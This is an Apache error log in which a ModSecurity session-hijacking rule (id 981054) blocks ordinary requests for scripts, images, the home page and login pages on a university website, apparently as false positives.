[Mon Aug 28 08:57:57.342606 2023] [:error] [pid 38726] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv-JcCo-f0AAJdGki0AAAAF"]
[Mon Aug 28 08:57:57.342696 2023] [:error] [pid 38686] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv-JcCo-f0AAJceGPMAAAAA"]
[Mon Aug 28 08:57:57.342873 2023] [:error] [pid 38764] [client 125.164.21.210] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv-JcCo-f0AAJdscJkAAAAM"]
[Mon Aug 28 08:57:57.442719 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv-JcCo-f0AAJceGPQAAAAA"]
[Mon Aug 28 08:57:57.442954 2023] [:error] [pid 38646] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv-JcCo-f0AAJb21E4AAAAB"]
[Mon Aug 28 08:57:57.481515 2023] [:error] [pid 38648] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv-JcCo-f0AAJb4sZUAAAAL"]
[Mon Aug 28 08:57:57.481617 2023] [:error] [pid 38764] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv-JcCo-f0AAJdscJoAAAAM"]
[Mon Aug 28 08:57:57.481619 2023] [:error] [pid 38726] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv-JcCo-f0AAJdGki4AAAAF"]
[Mon Aug 28 08:57:57.527812 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv-JcCo-f0AAJceGPUAAAAA"]
[Mon Aug 28 08:57:57.535694 2023] [:error] [pid 38646] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv-JcCo-f0AAJb21E8AAAAB"]
[Mon Aug 28 08:57:57.544958 2023] [:error] [pid 38648] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv-JcCo-f0AAJb4sZYAAAAL"]
[Mon Aug 28 08:57:57.558169 2023] [:error] [pid 38764] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv-JcCo-f0AAJdscJsAAAAM"]
[Mon Aug 28 08:57:57.573030 2023] [:error] [pid 38726] [client 125.164.22.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv-JcCo-f0AAJdGki8AAAAF"]
[Mon Aug 28 08:57:57.573051 2023] [:error] [pid 38648] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv-JcCo-f0AAJb4sZcAAAAL"]
[Mon Aug 28 08:57:57.576089 2023] [:error] [pid 38686] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv-JcCo-f0AAJceGPYAAAAA"]
[Mon Aug 28 08:57:57.586696 2023] [:error] [pid 38646] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv-JcCo-f0AAJb21FAAAAAB"]
[Mon Aug 28 08:57:57.600725 2023] [:error] [pid 38764] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv-JcCo-f0AAJdscJwAAAAM"]
[Mon Aug 28 08:57:57.609537 2023] [:error] [pid 38726] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv-JcCo-f0AAJdGkjAAAAAF"]
[Mon Aug 28 08:57:57.613329 2023] [:error] [pid 38648] [client 125.164.22.227] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv-JcCo-f0AAJb4sZgAAAAL"]
[Mon Aug 28 08:57:57.613739 2023] [:error] [pid 38646] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv-JcCo-f0AAJb21FEAAAAB"]
[Mon Aug 28 08:57:57.616045 2023] [:error] [pid 38686] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv-JcCo-f0AAJceGPcAAAAA"]
[Mon Aug 28 08:57:57.622700 2023] [:error] [pid 38764] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv-JcCo-f0AAJdscJ0AAAAM"]
[Mon Aug 28 08:57:57.704063 2023] [:error] [pid 38726] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-JcCo-f0AAJdGkjEAAAAF"]
[Mon Aug 28 08:58:00.618638 2023] [:error] [pid 38646] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-KMCo-f0AAJb21FIAAAAB"]
[Mon Aug 28 08:58:00.691190 2023] [:error] [pid 38764] [client 125.164.23.50] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-KMCo-f0AAJdscJ8AAAAM"]
[Mon Aug 28 08:58:03.313597 2023] [:error] [pid 38726] [client 125.164.20.190] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-K8Co-f0AAJdGkjQAAAAF"]
[Mon Aug 28 08:58:03.377537 2023] [:error] [pid 38764] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-K8Co-f0AAJdscKEAAAAM"]
[Mon Aug 28 08:58:03.802642 2023] [:error] [pid 38688] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-K8Co-f0AAJcg6eoAAAAD"]
[Mon Aug 28 08:58:04.195098 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LMCo-f0AAJbxpCAAAAAJ"]
[Mon Aug 28 08:58:04.340579 2023] [:error] [pid 38726] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-LMCo-f0AAJdGkjUAAAAF"]
[Mon Aug 28 08:58:04.495643 2023] [:error] [pid 38688] [client 125.164.19.9] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LMCo-f0AAJcg6esAAAAD"]
[Mon Aug 28 08:58:05.928092 2023] [:error] [pid 38726] [client 125.164.16.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-LcCo-f0AAJdGkjYAAAAF"]
[Mon Aug 28 08:58:06.001565 2023] [:error] [pid 38114] [client 125.164.18.135] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LsCo-f0AAJTiomEAAAAE"]
[Mon Aug 28 08:58:06.066954 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv-LsCo-f0AAJbxpCEAAAAJ"]
[Mon Aug 28 08:58:06.536866 2023] [:error] [pid 38763] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-LsCo-f0AAJdrnmEAAAAK"]
[Mon Aug 28 08:58:11.847028 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-M8Co-f0AAJbxpCMAAAAJ"]
[Mon Aug 28 08:58:12.227471 2023] [:error] [pid 38641] [client 114.79.54.222] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-NMCo-f0AAJbxpCQAAAAJ"]
[Mon Aug 28 08:58:26.764967 2023] [:error] [pid 38688] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv-QsCo-f0AAJcg6e8AAAAD"]
[Mon Aug 28 08:58:26.911332 2023] [:error] [pid 38647] [client 125.164.17.125] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv-QsCo-f0AAJb3RckAAAAH"]
[Mon Aug 28 09:01:07.687378 2023] [:error] [pid 38773] [client 52.167.144.173] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv-48Co-f0AAJd1fnsAAAAE"]
[Mon Aug 28 09:02:50.584955 2023] [:error] [pid 38688] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwASsCo-f0AAJcg6f8AAAAD"]
[Mon Aug 28 09:02:50.908223 2023] [:error] [pid 38774] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwASsCo-f0AAJd2kc8AAAAH"]
[Mon Aug 28 09:03:04.499381 2023] [:error] [pid 38727] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAWMCo-f0AAJdH0EcAAAAI"]
[Mon Aug 28 09:03:04.625189 2023] [:error] [pid 38772] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAWMCo-f0AAJd0nlEAAAAC"]
[Mon Aug 28 09:03:18.507971 2023] [:error] [pid 38727] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAZsCo-f0AAJdH0EgAAAAI"]
[Mon Aug 28 09:03:18.619165 2023] [:error] [pid 38772] [client 114.5.212.48] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAZsCo-f0AAJd0nlIAAAAC"]
[Mon Aug 28 09:04:20.293386 2023] [:error] [pid 38773] [client 125.164.23.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwApMCo-f0AAJd1fn0AAAAE"]
[Mon Aug 28 09:04:26.220859 2023] [:error] [pid 38683] [client 125.164.21.120] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOwAqsCo-f0AAJcb5AEAAAAP"]
[Mon Aug 28 09:04:44.113049 2023] [:error] [pid 38772] [client 125.164.19.245] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOwAvMCo-f0AAJd0nlMAAAAC"]
[Mon Aug 28 09:04:45.111622 2023] [:error] [pid 38765] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOwAvcCo-f0AAJdtodAAAAAO"]
[Mon Aug 28 09:04:45.113106 2023] [:error] [pid 38772] [client 125.164.20.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOwAvcCo-f0AAJd0nlQAAAAC"]
[Mon Aug 28 09:04:45.179860 2023] [:error] [pid 38774] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOwAvcCo-f0AAJd2kdAAAAAH"]
[Mon Aug 28 09:04:45.183393 2023] [:error] [pid 38646] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOwAvcCo-f0AAJb21F0AAAAB"]
[Mon Aug 28 09:04:45.185262 2023] [:error] [pid 38769] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOwAvcCo-f0AAJdxrTIAAAAS"]
[Mon Aug 28 09:04:45.188022 2023] [:error] [pid 38727] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOwAvcCo-f0AAJdH0EoAAAAI"]
[Mon Aug 28 09:04:45.190177 2023] [:error] [pid 38688] [client 125.164.19.22] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOwAvcCo-f0AAJcg6gEAAAAD"]
[Mon Aug 28 09:04:45.218846 2023] [:error] [pid 38683] [client 125.164.20.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOwAvcCo-f0AAJcb5AIAAAAP"]
[Mon Aug 28 09:04:45.220841 2023] [:error] [pid 38774] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOwAvcCo-f0AAJd2kdEAAAAH"]
[Mon Aug 28 09:04:45.223588 2023] [:error] [pid 38688] [client 125.164.23.90] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOwAvcCo-f0AAJcg6gIAAAAD"]
[Mon Aug 28 09:04:45.243786 2023] [:error] [pid 38727] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOwAvcCo-f0AAJdH0EsAAAAI"]
[Mon Aug 28 09:04:45.270506 2023] [:error] [pid 38646] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOwAvcCo-f0AAJb21F4AAAAB"]
[Mon Aug 28 09:04:45.273034 2023] [:error] [pid 38773] [client 125.164.16.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOwAvcCo-f0AAJd1fn8AAAAE"]
[Mon Aug 28 09:04:45.366190 2023] [:error] [pid 38774] [client 125.164.17.201] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOwAvcCo-f0AAJd2kdIAAAAH"]
